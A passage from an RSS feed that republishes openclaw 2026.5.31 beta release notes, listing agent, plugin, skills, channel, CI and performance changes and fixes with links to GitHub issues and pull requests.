<li>Plugins: add a SecretRef provider integration manifest contract and extract shared LLM core packages for provider/plugin reuse. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Skills: add the core skills index and centralize skills runtime loading, status, filtering, and prompt formatting.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/media: keep async image, music, and video generation starts from ending the Codex turn, so mixed requests can continue with summaries or other work while media renders in the background.</li>
<li>Agents/Codex: keep public OpenAI API-key profiles from being treated as native Codex app-server auth while preserving persisted Codex OAuth sessions.</li>
<li>Agents/Codex: stream Codex app-server final-answer partials to live reply previews, preserve ACP metadata in SQLite, prefer real tool results over synthetic repair output, and preserve workspace/session metadata through ACP runtime refactors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555235950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88405/hovercard" href="https://github.com/openclaw/openclaw/issues/88405">#88405</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558386594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88724/hovercard" href="https://github.com/openclaw/openclaw/pull/88724">#88724</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558459446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88730" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88730/hovercard" href="https://github.com/openclaw/openclaw/pull/88730">#88730</a>)</li>
<li>Control UI: keep collapsed tool cards labeled with the tool name and action instead of generic output text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: surface Skill Workshop guidance in Codex app-server prompts when <code>skill_workshop</code> is available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/auth: write auth profiles atomically, add force re-login recovery, preserve workspaces during state-only uninstall, and compact before oversized turns so recovery paths avoid partial state.</li>
<li>Skills: skip disabled skill env overrides from stale persisted snapshots so disabled skill <code>apiKey</code> SecretRefs cannot abort embedded or channel turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>CLI: avoid live catalog validation during <code>openclaw agents add</code>, so adding a secondary agent no longer depends on provider catalog availability. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370229397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76284/hovercard" href="https://github.com/openclaw/openclaw/issues/76284">#76284</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554276259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88314" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88314/hovercard" href="https://github.com/openclaw/openclaw/pull/88314">#88314</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CLI: keep <code>plugins list --json</code> on the snapshot-only path so plugin sweeps avoid loading the full runtime status graph.</li>
<li>Plugins: make PixVerse external-plugin ClawHub metadata explicit and keep it out of bundled dist builds.</li>
<li>Plugins: clarify plugin loader failure guidance so missing or incompatible plugin packages point operators at the right repair path.</li>
<li>Cron: keep SQLite cron migrations compatible with legacy run-log tables, archived job stores, diagnostic cron names, and legacy one-shot delete-after-run behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554018071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88285/hovercard" href="https://github.com/openclaw/openclaw/pull/88285">#88285</a>)</li>
<li>Memory: serialize QMD update/embed writes per store, preserve phase signals on read errors, and rewrite generated transcript paths on rollover so memory/search state survives concurrent gateway and CLI activity. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259457800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66339/hovercard" href="https://github.com/openclaw/openclaw/issues/66339">#66339</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510532697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85931" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85931/hovercard" href="https://github.com/openclaw/openclaw/pull/85931">#85931</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Media: allow validated TXT, JSON, YAML, and YML host-local document sends while rejecting binary-disguised text files. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4411236357" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79658" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79658/hovercard" href="https://github.com/openclaw/openclaw/pull/79658">#79658</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simplyclever914/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simplyclever914">@simplyclever914</a>.</li>
<li>Voice calls: migrate legacy call logs through doctor into plugin-state SQLite while keeping malformed or incomplete sources retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558509751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88731" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88731/hovercard" href="https://github.com/openclaw/openclaw/pull/88731">#88731</a>)</li>
<li>Providers: bound generated media downloads from OpenAI, Runway, xAI, MiniMax, BytePlus, DashScope-compatible, FAL, OpenRouter, Google, Vydra, and Comfy providers.</li>
<li>Providers/OpenAI: avoid orphan Responses message-id replay and sanitize raw HTTP 401 provider errors before they reach user-facing logs.</li>
<li>Providers: cap GitHub Copilot OAuth request timeouts before creating abort signals.</li>
<li>Cron: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot.</li>
<li>Agents/Codex: keep live session locks during cleanup, recover interrupted CLI tool transcripts, preserve Codex auth and compaction session identity, clear orphan tool state, cap app-server idle timers, and keep media completion delivery retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Chat/UI: show Gateway chat failures as visible assistant messages in the Control UI instead of only setting an invisible error state.</li>
<li>Channels: recover failed progress-draft starts and refresh just-started progress drafts across Discord, Telegram, Slack, Matrix, and Teams instead of losing early progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463729976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83115/hovercard" href="https://github.com/openclaw/openclaw/issues/83115">#83115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558636505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88749" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88749/hovercard" href="https://github.com/openclaw/openclaw/pull/88749">#88749</a>)</li>
<li>Discord: bound REST entity cache growth and keep recovered tool warning output mention-inert.</li>
<li>Channels: cap Telegram, Discord, WhatsApp, Signal, Feishu, Google Chat, Microsoft Teams, QQBot, Nostr, Zalo, Zalouser, and Nextcloud-style request/retry timers; preserve SMS approval reply routes; and retry WhatsApp QR login 408 timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>)</li>
<li>Security/config parsing: reject unsafe OAuth/token lifetimes, retry-after delays, inbound timestamps, response body sizes, command timeout config, sandbox observer token TTLs, and gateway WebSocket calls after close.</li>
<li>Gateway/security: rate-limit bootstrap-token verification, guard direct session display names, and add Tailscale Serve service-name support without weakening gateway exposure checks.</li>
<li>Providers/media: cap local service, model, usage, queue, generated media, TTS, music, workflow polling, and provider OAuth request timers across hosted and local providers.</li>
<li>Plugins/install: add npm README coverage for channel providers and pin WhatsApp media decoding to Baileys' supported peer range so external WhatsApp installs do not fail npm peer resolution.</li>
<li>Release/CI/E2E: bound release candidate reads, beta smoke REST calls, changelog restore, kitchen-sink and bundled plugin readiness probes, secret-provider probes, Vitest routing, and mainline test flakes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551354671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88127/hovercard" href="https://github.com/openclaw/openclaw/pull/88127">#88127</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551653681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88137/hovercard" href="https://github.com/openclaw/openclaw/pull/88137">#88137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552032597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88155" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88155/hovercard" href="https://github.com/openclaw/openclaw/pull/88155">#88155</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552192113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88160/hovercard" href="https://github.com/openclaw/openclaw/pull/88160">#88160</a>)</li>
<li>Release/CI/E2E: refresh pinned Node Docker image digests and keep pairing challenge assertions aligned with fenced approval commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495421361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84981/hovercard" href="https://github.com/openclaw/openclaw/issues/84981">#84981</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495608523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84988" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84988/hovercard" href="https://github.com/openclaw/openclaw/pull/84988">#84988</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LibraHo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LibraHo">@LibraHo</a>.</li>
<li>Release/CI/E2E: run the secret-provider integration proof through the repo pnpm runner so native macOS and Windows validation use the hydrated package-manager shim.</li>
<li>Release/CI/E2E: run the Telegram desktop proof gateway through the repo pnpm runner so native macOS proof uses the hydrated package-manager shim.</li>
<li>Docs/CI: run Mintlify anchor checks through the repo pnpm runner so docs link validation works when pnpm is only available through the hydrated package-manager shim.</li>
<li>Agents: keep configured fallback model metadata typed so provider params, context-token caps, and media input limits do not break changed-gate typechecks.</li>
<li>Agents: accept hidden <code>sessions_send</code> body aliases before validation while keeping the model-facing <code>message</code> schema canonical. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553200827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88229" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88229/hovercard" href="https://github.com/openclaw/openclaw/pull/88229">#88229</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CI/Crabbox: keep default runner capacity spot-only and provider-neutral so OpenClaw remote validation does not silently fall back to on-demand leases or stale AWS region hints.</li>
<li>CI/Crabbox: route Crabbox wrapper and Testbox workflow edits to their regression tests so changed-test gates do not silently run zero specs.</li>
<li>CI/workflows: route workflow sanity helper edits to their guard tests and cover composite-action input interpolation checks.</li>
<li>CI/tooling: route CI scope, dependency, changelog, and docs helper edits to their owner tests instead of silently skipping changed-test coverage.</li>
<li>CI/tooling: route package, release, and install helper edits to their owner tests so changed-test gates cover publish and installer script changes.</li>
<li>CI/tooling: route shared script library edits through their owner tests so lock, process, safety, and scan helpers do not skip changed-test coverage.</li>
<li>CI/tooling: skip expensive import-graph scans once a changed diff already requires broad fallback, keeping local changed-test planning fast while still collecting explicit owner tests.</li>
<li>CI/tooling: route script edits through conventional owner tests when matching <code>test/scripts</code> or <code>src/scripts</code> coverage already exists.</li>
<li>CI/tooling: honor option terminators in the memory FD repro script so follow-on arguments are not reparsed.</li>
<li>Release/CI/E2E: assert plugin lifecycle runtime inspect output instead of only capturing it.</li>
<li>Release/CI/E2E: make gateway-network prove the advertised health RPC and retry early WebSocket closes without burning full open timeouts.</li>
<li>Release/CI/E2E: honor option terminators across release, Parallels smoke, plugin gauntlet, and extension-memory scripts.</li>
<li>Release/CI/E2E: fail plugin gateway gauntlet QA chunks when the requested suite summary is missing or invalid.</li>
<li>Performance: prebuild QA runtime probes with generated plugin assets but without CLI startup metadata.</li>
<li>Performance: skip declaration bundling for runtime-only CLI startup and gateway watch build profiles.</li>
<li>Performance: reuse prepared provider handles, strict tool schemas, gateway runtime metadata, session maintenance config, plugin metadata, bundled skill allowlists, package-local plugin artifacts, single-entry store writes, and validated/serialized session prompt blobs.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.31-beta.2]]></title>
<description><![CDATA[2026.5.31
Highlights

Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (#88129, #88136, #88141, #88162, #88182)
Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, S...]]></description>
<link>https://tsecurity.de/de/3561241/downloads/openclaw-2026531-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561241/downloads/openclaw-2026531-beta2/</guid>
<pubDate>Sun, 31 May 2026 20:31:31 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.31</h2>
<h3>Highlights</h3>
<ul>
<li>Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Discord, Microsoft Teams, Google Chat, Google Meet, and iOS realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Provider and plugin requests now bound more timers, retries, OAuth/device-code lifetimes, media downloads, local service probes, and generated-content polling paths before they can hang a run.</li>
<li>Skills, session metadata, gateway runtime state, plugin metadata, and store writes do less repeated work on hot paths while keeping config and dispatch behavior stable.</li>
<li>Workboard, SecretRef plugin manifests, hosted iOS push relay, and external Copilot/Tokenjuice packaging add broader orchestration, integration, and plugin delivery surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544177368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87796/hovercard" href="https://github.com/openclaw/openclaw/pull/87796">#87796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550878888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88107/hovercard" href="https://github.com/openclaw/openclaw/pull/88107">#88107</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Release, CI, Docker, E2E, and diagnostics lanes now cap more logs, response bodies, readiness probes, artifact checks, and status polling so failures report bounded proof instead of stalling.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Docs: add a dedicated Skill Workshop guide covering governed skill creation, reviewable proposals, CLI, Gateway, agent tool behavior, approval policy, support files, and recovery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let the <code>skill_workshop</code> agent tool apply, reject, and quarantine explicit proposals through the guarded review flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let proposals carry approved support files under standard skill folders, with scanner, hash, and rollback safeguards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let pending proposals be revised in place with versioned, dated proposal frontmatter before approval. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: add Skill Workshop with pending proposals, CLI/Gateway review actions, rollback metadata, and the <code>skill_workshop</code> agent tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: externalize Tokenjuice as the official <code>@openclaw/tokenjuice</code> plugin with npm and ClawHub publish metadata.</li>
<li>Plugins: externalize the GitHub Copilot agent runtime as the official <code>@openclaw/copilot</code> plugin with npm and ClawHub publish metadata.</li>
<li>iOS: add hosted push relay defaults, realtime Talk playback, and a guarded WebSocket ping path for more reliable mobile sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Workboard: add orchestration primitives and agent coordination tools for multi-agent planning and run tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>)</li>
<li>Code mode: add internal namespaces for scoped agent/global sessions and exact namespace tool dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549263089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88043/hovercard" href="https://github.com/openclaw/openclaw/pull/88043">#88043</a>)</li>
<li>Control UI: add a Dreaming-tab agent selector and propagate the selected agent through Dreaming status, diary, and diary actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395906736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78748/hovercard" href="https://github.com/openclaw/openclaw/pull/78748">#78748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</li>
<li>Plugins: add a SecretRef provider integration manifest contract and extract shared LLM core packages for provider/plugin reuse. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Skills: add the core skills index and centralize skills runtime loading, status, filtering, and prompt formatting.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/media: keep async image, music, and video generation starts from ending the Codex turn, so mixed requests can continue with summaries or other work while media renders in the background.</li>
<li>Agents/Codex: keep public OpenAI API-key profiles from being treated as native Codex app-server auth while preserving persisted Codex OAuth sessions.</li>
<li>Control UI: keep collapsed tool cards labeled with the tool name and action instead of generic output text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: surface Skill Workshop guidance in Codex app-server prompts when <code>skill_workshop</code> is available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI: keep <code>plugins list --json</code> on the snapshot-only path so plugin sweeps avoid loading the full runtime status graph.</li>
<li>Plugins: make PixVerse external-plugin ClawHub metadata explicit and keep it out of bundled dist builds.</li>
<li>Cron: keep SQLite cron migrations compatible with legacy run-log tables, archived job stores, diagnostic cron names, and legacy one-shot delete-after-run behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554018071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88285/hovercard" href="https://github.com/openclaw/openclaw/pull/88285">#88285</a>)</li>
<li>Providers: bound generated media downloads from OpenAI, Runway, xAI, MiniMax, BytePlus, DashScope-compatible, FAL, OpenRouter, Google, Vydra, and Comfy providers.</li>
<li>Providers: cap GitHub Copilot OAuth request timeouts before creating abort signals.</li>
<li>Cron: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot.</li>
